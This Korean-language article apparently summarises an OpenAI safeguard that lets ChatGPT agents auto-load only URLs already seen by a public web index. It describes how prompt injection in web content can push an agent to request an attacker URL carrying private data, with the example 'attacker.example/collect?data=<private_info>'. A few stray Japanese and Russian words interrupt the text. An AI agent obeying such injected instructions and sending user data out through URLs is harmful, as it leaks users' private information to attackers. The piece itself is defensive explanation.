OpenAI AI 에이전트 링크 안전
OpenAI는 URL을 통해 민감한 사용자 데이터가 유출되는 것을 방지하기 위한 새로운 보안 조치를 도입했습니다. 웹에서 이미 공개적으로 존재하는 주소로 자동 URL 가져오기를 제한함으로써, OpenAI는 ChatGPT에서의 에이전트 경험과 관련된 URL 기반 데이터 유출 위험을 완화하려고 합니다.
URL 기반 데이터 유출 방지
AI 에이전트는 조작되어 이메일 주소나 문서 제목과 같은 민감한 사용자 정보를 쿼리 매개변수에 포함시킨 URL을 요청할 수 있습니다. 웹사이트는 요청된 URL을 서버 로그에 기록하기 때문에, 모델이 채팅에서 민감한 정보를 명시적으로 출력하지 않더라도 공격자는 이 개인 데이터를 캡처할 수 있습니다.
이 위험은 프롬프트 인젝션 기법으로 증폭됩니다. 여기서 공격자는 웹 콘텐츠에 지침을 삽입하여 모델 동작을 재정의하고 에이전트가 특정 악성 URL을 로드하도록 강제합니다(예: https://attacker.example/collect?data=<private_info>).
전통적인 신뢰 목록의 한계
OpenAI는 간단한 "신뢰 사이트 목록" 또는 허용 목록이 두 가지 주요 이유로 인해 충분하지 않다고 지적합니다.
- 리다이렉트: 신뢰할 수 있는 도메인에서 시작된 링크가 공격자가 제어하는 대상으로 리다이렉트될 수 있습니다.
- 사용자 경험: 엄격한 허용 목록은 과도한 마찰과 "잘못된 경보"를 만들어 사용자가 보안 경고를 무시하게 할 수 있습니다.
도메인이 평판이 좋은지 여부에 초점을 맞추는 대신, OpenAI의 접근 방식은 특정 URL이 자동으로 가져오기에 안전한지 여부에 초점을 맞춥니다.
공개 URL 검증 시스템
URL에 사용자별 비밀이 포함되지 않도록 보장하기 위해, OpenAI는 사용자 대화, 계정, 개인 데이터에 접근하지 않고 공개 URL을 발견하는 독립적인 웹 인덱스(크롤러)를 활용합니다.
에이전트가 자동으로 URL을 가져오려고 할 때, 시스템은 이 인덱스와 URL을 비교합니다:
- 확인된 공개 URL: URL이 이전에 관찰된 공개 URL과 일치하면, 에이전트가 자동으로 이를 로드합니다.
- 확인되지 않은 URL: 일치하는 것이 없으면, URL은 확인되지 않은 것으로 처리됩니다. 에이전트는 다른 사이트를 시도하도록 알려질 수 있거나, 시스템은 경고 dialog를 통해 명시적인 사용자 행동을 요구할 수 있습니다.
사용자 인터페이스 및 컨트롤
링크를 공개로 확인할 수 없을 때, 사용자는 해당 링크가 확인되지 않았으며 제3자 사이트와 대화 데이터를 공유할 수 있다는 경고를 볼 수 있습니다.これにより、 사용자의 지식 없이 백그라운드에서 리소스를 로드할 수 있는 "조용한 유출"을 방지합니다.
범위 및 다층 방어
이 보호 조치는 리소스 가져오기 과정에서 URL 자체를 통해 사용자별 데이터 유출을 방지하도록 특별히 설계되었습니다. 모든 웹 안전 문제에 대한 포괄적인 솔루션은 아닙니다. 구체적으로, 다음을 보장하지 않습니다:
- 웹 페이지 콘텐츠의 신뢰성
- 사회 공학 공격에 대한 보호
- 페이지에 오해의 소지 또는 вред한 지시가 존재하는 것
OpenAI는これを 프롬프트 인젝션에 대한 모델 수준 완화, 제품 컨트롤, 모니터링, 지속적인 레드 팀링을 포함하는 보다 넓은 다층 방어 전략의 한 층으로 간주합니다.